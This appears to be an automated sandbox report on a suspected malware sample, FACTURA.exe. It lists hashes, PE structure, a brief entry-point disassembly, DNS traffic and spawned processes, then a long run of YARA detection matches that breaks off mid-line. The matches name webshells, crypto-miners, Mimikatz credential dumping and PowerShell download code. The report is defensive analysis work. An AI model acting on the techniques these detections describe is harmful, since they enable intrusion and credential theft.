File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52456
Entropy (8bit):	4.449895321849691
Encrypted:	false
SSDEEP:	768:7rypn9K/Gd67WzUi+YXCujpbemXuQx/Vhjhxp1ZR1P4M8/GQT:ap9KOPZXC+XLjZHPQ/x
MD5:	57DD5DCD626332FA892BF1526D09C1D9
SHA1:	B0D2C0D3CC46C7E7F560D11117C5DD7C2817AF5C
SHA-256:	385171BD15127FB8546EF4378CBEA2BF25F5063E6E731DFEB4EF868829FB25B9
SHA-512:	4F59C6E5DE864D07A675ECA116AB308C25CFA67EBB8345376FC98ECEFDA49CBF0BFD96A7371E398EC661E7F546C84C49D6E98556F767B32432E03BFFED04C278
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	5.027883032614938
Encrypted:	false
SSDEEP:	384:7rHwnD0qkg1Wl+R0UdhR3ZVdZFzd4SWS8/WNRDBRJbQl5c:7rQnYqkg1Wl+R0U7VXFzdOIR1PbT
MD5:	FEA5726C8962F98A3601E47EADB5A3E9
SHA1:	FDDCB373EEC6E22B7706A588CDDA4F0822237538
SHA-256:	FC18C509866893EB03BC82F49C0EF07C344640CF8D6FA3963247ABB7521A4A56
SHA-512:	CB63D5656B1822668285B6C1B1594BBE1B364EF45AC4C5618D7C436C93BD38623B06140383DE58A610EA7FEB92BB741AC7477AAB104A0CCBF671125D2D83CA5C
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........H...............................................p............@.......................................... ...E...........J... ...........................................................................................rdata..p...........................@..@.rsrc....E... ...F..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@A...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	647416
Entropy (8bit):	6.2677434000059975
Encrypted:	false
SSDEEP:	12288:RE74OZLauRb4Z7W42oza9hIXTzq+g57U2ibvko43Shu/6U:toLauRaWMTPg9U2ibcH3SU
MD5:	BBDFA9DA2F8E10903C095F504A2188B1
SHA1:	E670D3739742A460C8C3AA5A2CC911A4ACFEFA8D
SHA-256:	4B3DE446F41D0410C06E9FAFF8823D380BCBDADB5B381C702CE3A5E2535A7142
SHA-512:	A30280A65726142551F2CBFB3A41337B309BDBEABCF710B5654CBD1415453AD2D69A7EC7C753A4E297557755D4204CABA4881938F805E667888523CD99F338FF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M2`..S...S...S...!...S...S..S...!...S...!..+S...!...S...!...S...&...S...&..XS...&...S...&...S..Rich.S..........................PE..d...+s.P.........." ......... ......`M...............................................\|....`A............................................................(....`...K....... ...........G..p.......................(.......8............................................text............................... ..`.rdata...m.......p..................@..@.data....9... ...0... ..............@....pdata...K...`...P...P..............@..@.rsrc...(...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.139143013850931
Encrypted:	false
SSDEEP:	768:7r690VA3iN3v240ynoFXuAQ8UyCNbHQSfr+FABZgdTypKR1PJl:iyHGyoFXXfW7Q2r+FAodTypKHPJl
MD5:	B6A28B3D905B28545AC4EC448846C6F4
SHA1:	C59E0A7600A0A76B25B46A7B5D1574BA09FC6826
SHA-256:	89404202E75E8D03AF2458906D9622C7ECD43F4B30180B079B143B77EA6BA6A4
SHA-512:	650319B0A81FB5A1BACE4760C14BA37245A9FB23F4A7E5B18B3BE279A5EDF5063BB1CF5C8631AEC30ACEDCF3F92219B63279A4B01DA80C21B2182C88F56F9158
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}.....@.......................................... ..h................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58616
Entropy (8bit):	4.347687086754615
Encrypted:	false
SSDEEP:	768:7ruyfm07DjkGDxibCs79eoh9ewh/6L3NM6MAM8rbrubOezWyi4JzOcfQT/ZsH+KY:5H6BJdLd0dZLTOy+JdVfQT/eNNTvHPtW
MD5:	1CEB1C751D2CF63A0856B30A74486565
SHA1:	7D388EF3D300849D5E08FFA8F37DBB72765EED9B
SHA-256:	4421F31079246BD5A8B2C76B305BD88251DE81DAA0DBFDC393ACE55198B58F34
SHA-512:	00929E60E67BB9ABD2D4081D387B13D25D819DDCEFABE3384C0FB70C47566FE675499768C1455DDAB7480D1696F956A2448DF1064E7A9DA72085F04A19EE39B9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................H.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.2442298972838195
TrID:	Win32 Executable (generic) a (10002005/4) 99.01% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Visual Basic Script (13500/0) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	FACTURA.exe
File size:	143360
MD5:	740463ed3266f7aee8331978f50c731c
SHA1:	a9310948476693d72be937f23e1b53b3607bf92f
SHA256:	fa9e12a03b909482d5bacd2d7ab1a8d672528bfcf43402c04b6d3a30702b0c4d
SHA512:	15bd20faadbcc09b236e8408cf0b5f0903ad39cb1183b99e9a767e0a58ddc65624f27fa0fc983900af669bbe43a7766e7e6493d4e002833b3d3e5026b63079af
SSDEEP:	3072:tPM2YNAkMB0fkeX4QKDmBnmY4tmT9tzh/jrVB:tPM2YNAkMBykeX4wrLrVB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....+.N..........................................@........

File Icon


Icon Hash:	00e4d2c2dac20042

Static PE Info

General
Entrypoint:	0x4018dc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4E922BCC [Sun Oct 9 23:18:36 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d0ac0bdf3a5152bcac064d77eed21690

Entrypoint Preview

Instruction
push 004106A8h
call 00007F7CC88E3603h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dh, bh
lodsb
fdiv qword ptr [ecx+68h]
and byte ptr [esi+46h], bh
xchg eax, ebp
add al, EFh
mov bh, A9h
sbb al, E3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
jo 00007F7CC88E3685h
jne 00007F7CC88E3677h
outsd
jnc 00007F7CC88E3686h
jne 00007F7CC88E3676h
imul ebp, dword ptr [edi+75h], 00796C73h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
cmp bl, cl
cmc
push eax
and ebx, dword ptr [ebx+4Eh]
add dword ptr [ebp+eax*4-7Dh], eax
and dword ptr [ebx], edi
add al, CFh
mov dh, byte ptr [ebp-6650AD4Bh]
xchg eax, esp
test al, 67h
inc edi
call far 8565h : 7219F9CBh
mov ebp, 33AD4F3Ah
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ebx, ebp
add byte ptr [eax], al
call far 0005h : 00000001h
push 736B6E61h
add byte ptr [41000E01h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18e84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b000	0x75f9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x184f0	0x19000	False	0.479140625	data	6.34090617011	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0xd20	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1b000	0x75f9	0x8000	False	0.238891601562	data	5.20756276635	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x1b628	0x6fd1	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x1b500	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1b4ec	0x14	data
RT_VERSION	0x1b140	0x3ac	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaRecAnsiToUni, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaBoolStr, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collides Systems, Inc.
InternalName	Counterfoil7
FileVersion	4.00
CompanyName	Collides Systems, Inc.
LegalTrademarks	Collides Systems, Inc.
Comments	Collides Systems, Inc.
ProductName	Collides Systems, Inc.
ProductVersion	4.00
FileDescription	Collides Systems, Inc.
OriginalFilename	Counterfoil7.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 11:05:32.716264963 CEST	61849	53	192.168.11.20	1.1.1.1
Oct 8, 2021 11:05:32.754240036 CEST	53	61849	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 8, 2021 11:05:32.716264963 CEST	192.168.11.20	1.1.1.1	0x26f1	Standard query (0)	spclient.wg.spotify.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 8, 2021 11:05:32.754240036 CEST	1.1.1.1	192.168.11.20	0x26f1	No error (0)	spclient.wg.spotify.com	edge-web.dual-gslb.spotify.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 11:05:32.754240036 CEST	1.1.1.1	192.168.11.20	0x26f1	No error (0)	edge-web.dual-gslb.spotify.com		35.186.224.25	A (IP address)	IN (0x0001)
Oct 8, 2021 11:11:00.805844069 CEST	1.1.1.1	192.168.11.20	0x321e	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: FACTURA.exe PID: 7040 Parent PID: 3440

General

Start time:	11:02:34
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\FACTURA.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\FACTURA.exe'
Imagebase:	0x400000
File size:	143360 bytes
MD5 hash:	740463ED3266F7AEE8331978F50C731C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: WerFault.exe PID: 8016 Parent PID: 7040

General

Start time:	11:02:36
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
Imagebase:	0x3e0000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	moderate

Analysis Process: WerFault.exe PID: 2516 Parent PID: 7040

General

Start time:	11:02:42
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 856
Imagebase:	0x3e0000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	moderate

Analysis Process: UserOOBEBroker.exe PID: 2888 Parent PID: 1036

General

Start time:	11:08:03
Start date:	08/10/2021
Path:	C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:	0x7ff617640000
File size:	57856 bytes
MD5 hash:	BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: mpam-5e107659.exe PID: 6940 Parent PID: 6040

General

Start time:	11:08:08
Start date:	08/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe' /q WD
Imagebase:	0x7ff67cd30000
File size:	15598000 bytes
MD5 hash:	58454E5B478373BF68420AE5D49380D4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: MpSigStub.exe PID: 5556 Parent PID: 6940

General

Start time:	11:08:11
Start date:	08/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Imagebase:	0x7ff77d6a0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, Author: Joe Security Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, Author: Cylance Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp, Author: Florian Roth Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, Author: Joe Security Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000003.6336234827.00000197A31B6000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, Author: Joe Security Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: 